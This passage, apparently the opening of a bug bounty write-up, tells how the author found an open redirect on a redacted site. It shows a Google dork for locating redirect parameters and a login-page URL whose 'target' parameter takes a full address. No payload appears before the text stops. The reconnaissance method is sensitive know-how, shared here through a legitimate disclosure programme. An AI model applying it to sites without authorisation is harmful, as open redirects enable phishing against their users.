Member-only story
A swag for a Open Redirect — Google Dork — Bug Bounty
Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got. I am also currently modifying my scanner, PSFuzz, so that it can also scan OpenRedirects and will then improve it over time. https://github.com/Proviesec/PSFuzz
And here is my story:
I was invited to a new private BugBounty programme and thought, well, I’ll look for the easy stuff first. Since I use Burp, I record my history with all redirects and links, which makes searching for bugs easier. After investigating a few simple security holes, I actually wanted to try to find some XSS stuff. I also like to use Google Dorks, for example I used
site:*redacted.com inurl:target and had a result, so I looked to see if it was suitable for an open redirect.
Steps To Reproduce:
- Behind the google result was the login page of the website. And I always love to test these. And this time I noticed that the parameter target contained a whole URL, which was very tempting to test.
The url looks like this: https://my.redacted.com/forgetUsername?target=https:%2F%2Fwww.redacted.com
Therefore, you could already see that the link no longer jumps to the “my” subdomain but to the “www” subdomain.
